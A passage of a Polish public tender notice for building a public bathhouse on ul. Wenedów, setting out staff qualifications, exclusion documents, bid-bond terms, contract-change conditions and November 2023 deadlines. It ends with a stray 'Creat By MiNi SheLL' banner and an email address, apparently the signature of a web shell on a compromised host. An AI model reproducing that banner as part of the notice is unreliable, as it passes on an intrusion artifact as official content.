5<br/>do SWZ.<br/>2. Przedstawi Zamawiającemu Oświadczenie o dysponowaniu potencjałem kadrowym w zakresie osób, posiadających<br/>wymagane ustawą – Prawo budowlane<br/>(t.j. Dz.U. z 2023 r., poz. 682 z późn. zm.), kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędnego<br/>do wykonania przedmiotu zamówienia wraz z informacją o łączących strony stosunkach prawnych i utrzyma ich przez cały<br/>czas realizacji przedmiotu zamówienia. Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedstawi informacje<br/>w formie Oświadczenia - Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, stanowiącego Załącznik nr<br/>4 do SWZ, które wskaże na łączne dysponowanie następującymi osobami:<br/>a) 1 osobą przewidzianą do pełnienia funkcji kierownika budowy posiadającą uprawnienia budowlane bez ograniczeń do<br/>wykonywania samodzielnych funkcji w specjalności konstrukcyjno-budowlanej oraz aktualne zaświadczenie o<br/>przynależności do właściwej Izby Samorządu Zawodowego. Wskazana osoba musi posiadać co najmniej 5-cio letnie<br/>doświadczenie w pełnieniu funkcji kierownika budowy, w tym przy realizacji co najmniej 1 budynku, o których mowa w ust.2<br/>pkt 4) ppkt 1.<br/>Na potwierdzenie powyższych wymogów Wykonawca załączy do Oświadczenia stosowne referencje dla Kierownika<br/>Budowy w zakresie wymogów opisanych powyżej;<br/>b) 1 osobą przewidzianą do pełnienia funkcji kierownika robót posiadającą uprawnienia budowlane bez ograniczeń do<br/>wykonywania samodzielnych funkcji w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych przynależącą do właściwej Izby Samorządu Zawodowego. Wskazana osoba musi posiadać co<br/>najmniej 3 – letnie doświadczenie na stanowisku kierownika robót w zakresie budowy lub remontu budynków w branży<br/>elektrycznej,<br/>c) 1 osobą przewidzianą do pełnienia funkcji kierownika robót posiadającą uprawnienia budowlane do wykonywania<br/>samodzielnych funkcji w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych oraz aktualne zaświadczenie o przynależności do właściwej Izby Samorządu<br/>Zawodowego. Wskazana osoba musi posiadać co najmniej 3 – letnie doświadczenie na stanowisku kierownika robót w<br/>zakresie budowy lub remontu budynków w branży sanitarnej.<br/>d) 1 osobą wyznaczoną do pełnienia funkcji kierownika robót ogrodniczych posiadającą wyższe wykształcenie I lub II<br/>stopnia w kierunku architektura krajobrazu lub ogrodnictwo i posiada co najmniej roczną praktykę zawodową w<br/>wykonywaniu zamówień związanych z gospodarką zielenią lub w zakresie pielęgnacji terenów zieleni albo wykształcenie<br/>średnie kierunkowe: ogrodnicze lub tereny zielone i posiada co najmniej 3-letnią praktykę zawodową w wykonywaniu<br/>zamówień związanych z gospodarką zielenią lub w zakresie pielęgnacji terenów zieleni.<br/>Zamawiający informuje, że Osoby proponowane do pełnienia funkcji kierownika budowy i robót muszą posiadać<br/>uprawnienia do wykonywania samodzielnych funkcji w budownictwie wystarczające do wykonywania tych funkcji w<br/>odniesieniu do robót objętych zamówieniem i odpowiadające wymaganiom określonym ustawą – Prawo budowlane (t.j.<br/>Dz.U. z 2023 r., poz. 682 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów oraz odpowiadające wymaganiom określonym w ustawie o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa (t.j. Dz.U. z 2023 r., poz. 551 z późn. zm.). W przypadku, gdy Wykonawca<br/>wykazuje osoby, które nabyły kwalifikacje wymagane do wykonywania działalności w budownictwie poza terytorium RP,<br/>osoby te muszą posiadać decyzje w sprawie uznania kwalifikacji w danej branży budowlanej zgodnie z ustawą z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/> (t.j.Dz. U. z 2023 r., poz. 334) lub posiadać prawo do świadczenia usług transgranicznych zgodnie z ustawą <br/>z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa (t.j. Dz. U. z 2023 r. poz. 551). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz oświadczeń lub<br/>dokumentów, jakie na wezwanie Zamawiającego mają dostarczyć Wykonawcy w celu potwierdzenia braku podstaw do wykluczenia<br/>– podmiotowe środki dowodowe:<br/>a) Oświadczenie o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 roku o<br/>podatkach i opłatach lokalnych na dzień złożenia oferty (t.j. Dz. U. z 2023 poz. 70), Załącznik Nr 11 do SWZ.<br/>b) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689), z innym<br/>Wykonawcą, Załącznik nr 13 do SWZ.<br/>c) wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce<br/>zamieszkania, lub wskaże miejsce jego weryfikacji.<br/>d) kopię dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumą gwarancyjną nie mniejszą niż: 2 000.000,00 zł (dwa<br/>miliony złotych).<br/>e) Oświadczenie o aktualności informacji - Załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu mają dostarczyć – podmiotowe środki dowodowe:<br/>Oświadczenie wykaz robót budowlanych – Załącznik nr 5 do SWZ wraz z dowodami określającymi czy te roboty budowlane zostały<br/>wykonane należycie.<br/>Oświadczenie wykaz potencjału kadrowego – Załącznik nr 4 do SWZ.<br/>SEKCJA</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej Oferty wadium w wysokości 35 000,00 zł (słownie: trzydzieści<br/>pięć tysięcy złotych 00/100)<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2023 r. poz. 462).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku City Bank Handlowy nr rachunku<br/>67103015080000000550041049 z dopiskiem „Wadium – Budowa łaźni publicznej przy ul. Wenedów”. Wadium musi być<br/>złożone lub wpłynąć na rachunek bankowy określony powyżej przed upływem terminu składania ofert. Za termin wniesienia<br/>wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Potwierdzenie wpłaty wadium należy dołączyć do oferty w postaci elektronicznej.<br/>6. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>Pozostałe informacje na temat Wadium zawarte są w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza, iż Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku :<br/>a) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w<br/>sprawie zamówienia publicznego w przypadku jego uzyskania i do Oferty załączają stosowne Pełnomocnictwo;<br/>b) Pełnomocnictwo winno określać w szczególności: przedmiot postępowania którego dotyczy, dane Wykonawców wspólnie<br/>ubiegających się o zamówienie, dane pełnomocnika, oraz zakres umocowania pełnomocnika;<br/>c) każdy z Wykonawców składa Oświadczenie, Załącznik Nr 2 do SWZ, celem potwierdzenia braku podstaw wykluczenia<br/>oraz spełniania warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu;<br/>d) każdy z Wykonawców składa Oświadczenie o niepodleganiu wykluczeniu – Załącznik nr 12 do SWZ<br/>e) wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego dane i adres<br/>należy wpisać w formularzu oferty lub wskazać w treści Oferty.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>określonego w ust. 2 pkt 4) ppkt 1 dopuszcza łączne spełnianie warunku przez Wykonawców. Zamawiający uzna spełnienie<br/>niniejszego wymogu jeśli, co najmniej jeden z Wykonawców wspólne ubiegających się o udzielenie zamówienia spełni<br/>niniejszy warunek i potwierdzi go złożonym Oświadczeniem, Załącznik nr 5 do SWZ<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności zawodowych dopuszcza łączne spełnianie warunku przez Wykonawców. Zamawiający uzna<br/>spełnienie niniejszego wymogu jeśli, co najmniej jeden z Wykonawców wspólne ubiegających się o udzielenie zamówienia<br/>spełni niniejszy warunek i potwierdzi go złożonym Oświadczeniem Załącznik nr 4 do SWZ.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, stosowanie do zapisu art.117 ust.4 PZP, dołączają do oferty<br/>Oświadczenie - Wykonawców Wspólnie ubiegających się o udzielenie zamówienia Załącznik nr 9 do SWZ z którego wynika,<br/>które roboty budowlane wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość zmiany Umowy w stosunku do treści oferty Wykonawcy:<br/>1) wstrzymania robót przez Zamawiającego, jeżeli wstrzymanie nie nastąpiło z przyczyn leżących po stronie Wykonawcy;<br/>2) wstrzymania robót na mocy decyzji organu administracji publicznej lub orzeczenia sądu, jeżeli wstrzymanie nie nastąpiło<br/>z przyczyn leżących po stronie Wykonawcy;<br/>3) wystąpienia konieczności przedłużenia okresu wykonywania Przedmiotu Umowy z uwagi na zmianę obowiązujących<br/>przepisów prawa;<br/>4) wystąpienia konieczności zaniechania części zakresu Przedmiotu Umowy lub wystąpienia robót dodatkowych, w<br/>szczególności, jeżeli zaniechanie lub wystąpienie robót dodatkowych ma wpływ na termin i sposób wykonania Przedmiotu<br/>Umowy, w tym w następujących przypadkach:<br/>a) wprowadzenia zmian w Dokumentacji Projektowej, na podstawie której jest wykonywany Przedmiot Umowy,<br/>niewykraczających poza jego zakres, w szczególności, jeżeli zmiany te prowadzą do usunięcia wad Dokumentacji<br/>Projektowej, które nie były znane Stronom Umowy przed przystąpieniem Wykonawcy do wykonywania Przedmiotu Umowy,<br/>b) wystąpienia konieczności zwiększenia bezpieczeństwa wykonywania robót lub usprawnienia procesu ich wykonywania;<br/>5) wystąpienia konieczności zmiany materiałów niezbędnych do wykonania Przedmiotu Umowy, pod warunkiem, że zmiana<br/>ta będzie korzystna dla Zamawiającego lub będzie wynikała z okoliczności niezależnych od Stron Umowy, takich jak<br/>niedostępność materiałów na rynku spowodowana zaprzestaniem produkcji lub wycofaniem z rynku;<br/>6) gdy zmiana terminu realizacji Przedmiotu Umowy lub terminów określonych w Harmonogramie będzie konieczna, na<br/>skutek okoliczności, których Strony nie mogły wcześniej przewidzieć;<br/>7) gdy zmiany w zakresie Przedmiotu Umowy i/lub terminu realizacji Umowy są niezbędne do wprowadzenia na skutek<br/>działania siły wyższej;<br/>8) gdy zmiany w terminie realizacji Umowy wynikają z okoliczności, za które odpowiedzialność ponosi Zamawiający, w<br/>szczególności będą następstwem nieterminowego przekazania terenu budowy, konieczności zmiany Dokumentacji<br/>Projektowej w zakresie, w jakim ww. okoliczności będą miały wpływ na dotrzymanie Terminu Końcowego;<br/>9) gdy zmiany w terminie realizacji Umowy wynikają z opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania<br/>których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w<br/>przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność;<br/>10) gdy zmiany w terminie realizacji Umowy spowodowane są wystąpieniem niekorzystnych warunków atmosferycznych<br/>uniemożliwiających prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: umową,<br/>normami lub innymi przepisami, wymagającej określonych warunków atmosferycznych, jeżeli konieczność wykonania prac<br/>w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;<br/>11) określonych w art. 455 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-09 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zmw-waw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com